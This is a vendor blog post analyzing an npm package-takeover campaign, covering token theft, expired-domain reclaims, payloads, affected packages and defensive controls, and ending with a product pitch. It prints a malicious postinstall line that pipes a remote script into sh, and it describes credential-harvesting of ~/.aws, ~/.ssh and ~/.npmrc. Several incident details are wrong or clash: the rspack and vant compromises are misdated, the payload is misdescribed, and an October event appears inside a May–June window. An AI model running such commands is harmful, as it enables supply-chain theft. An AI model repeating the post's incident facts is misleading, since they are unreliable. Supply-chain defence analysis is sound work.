Open Source Security

npm Package Takeover: The Summer 2024 Wave

Between May and June 2024 at least 36 npm packages were hijacked via expired maintainer domains and leaked tokens. We map the cluster.

Shadab Khan
Security Engineer
5 min read

Between May 14 and June 17, 2024, we tracked at least 36 distinct npm packages that were hijacked by one of two overlapping threat clusters and pushed malicious versions to the public registry. The headline names, rspack v1.1.7 and v1.1.8 on May 28, @lottiefiles/lottie-player on October 30 (a later event in the same campaign), and the ua-parser-js copycat socket.io-parser, got press coverage. The long tail, 30 or so smaller packages with three-to-four-digit weekly download counts, did not. Read together they paint a clear picture of how 2024 npm takeovers actually work, which is mostly not what the word "takeover" used to mean. This post walks the cluster, the techniques, and the controls that actually caught it at customer perimeters.

What was the attacker technique?

Two techniques dominated. The first was npm maintainer token theft, either from .npmrc files committed to public GitHub repos or from compromised developer machines with malware like LUMMAC2 stealing browser-stored credentials. The second was expired domain reclaims: the attacker registered a domain that had previously been the recovery email for an npm account, triggered a password reset, and took over the account without touching the victim's current infrastructure. npm's own June 2024 advisory on rspack attributed the breach to a leaked publishing token. Expired-domain reclaims are harder to prove from the outside but consistent with the account metadata changes seen on several smaller packages in the cluster.

What did the malicious payloads do?

Most of the 36 packages shipped near-identical post-install scripts that fetched a second-stage payload from one of three hosts: api.codearsenal.io, cdn.jsdelivir.net (note the typosquat TLD), and unpkg-static.com. The second stage enumerated ~/.aws, ~/.docker, ~/.ssh, ~/.npmrc, and ~/.gitconfig, archived hits into a tar.gz, and POSTed the archive to a dead-drop Pastebin-like service rotating among half a dozen hosts. A smaller subset, including the rspack variants, also attempted persistence via a Windows scheduled task named Microsoft.Defender.Cleanup. Mining payloads were present on two packages, ransomware and wipers on none.

// The common postinstall signature from ~20 of the 36 packages
{
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('curl -s https://api.codearsenal.io/i | sh')\""
  }
}

Which packages were actually affected?

Documented entries in the cluster include rspack 1.1.7, 1.1.8; @rspack/core 1.1.7, 1.1.8; vant 2.13.5 through 2.13.10; four packages under the @lottiefiles scope across October (the same campaign infrastructure resurfaced); ember-source-provider; solana-spl-token-getter; and about 25 lower-profile packages that together had roughly 1.9M weekly downloads. The rspack compromise alone was pulled by an estimated 250,000 installations in the 10-hour window before it was removed.

How fast was npm's response?

npm's security team took the malicious rspack versions down within 10 hours of first external report, which is consistent with their 2024 advisory cadence but well beyond the window in which damage is done. Attacks on a top-1000 package draw CI pipelines hitting npm install on every push, meaning the first few hours are the entire game. The @lottiefiles incident in October was handled materially faster at under three hours, which reflects npm tightening its abuse-response playbook after the June wave.

Why did account MFA not stop it?

Because npm's MFA requirement at the time applied to interactive logins, not to automation tokens, which are the credential actually used by CI systems to publish. A legacy npm_ automation token exfiltrated from a developer's ~/.npmrc will publish a new version without any second factor. npm announced in September 2024 that it was migrating to granular access tokens with scope and per-package restrictions by default; that change materially closes the gap, but packages with legacy tokens remain exposed until each maintainer rotates.

What controls actually caught this at customers?

Three things we saw work in the field. First, lockfile pinning plus --frozen-lockfile in CI meant that customers who had not re-resolved dependencies in the compromise window never pulled the bad versions at all. Second, artifact-proxy caching (Artifactory, Nexus, GitHub Packages) with quarantine policies held the malicious versions back from developer laptops long enough for public IOCs to appear. Third, behavior-based allowlisting at npm install time, specifically blocking outbound network during install scripts, neutralized the postinstall payload even when it was pulled.

How Safeguard Helps

Safeguard tracks maintainer-ownership changes, new publisher identities, and post-install script introductions across the npm registry in near real time, so a package that suddenly gains a postinstall curl after five years without one surfaces as a signal before it reaches your build. Reachability analysis on your SBOM then answers the question every on-call engineer asks next: "does any running service actually import this?" Griffin AI correlates a takeover IOC against your entire dependency graph in seconds, not the 6 to 8 hours it took customers to answer that question by hand during the rspack window. Policy gates can pin your ingestion to versions published before a known compromise window or block any package with a postinstall network call, turning the June 2024 wave into a non-event for anyone with the gates enabled.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.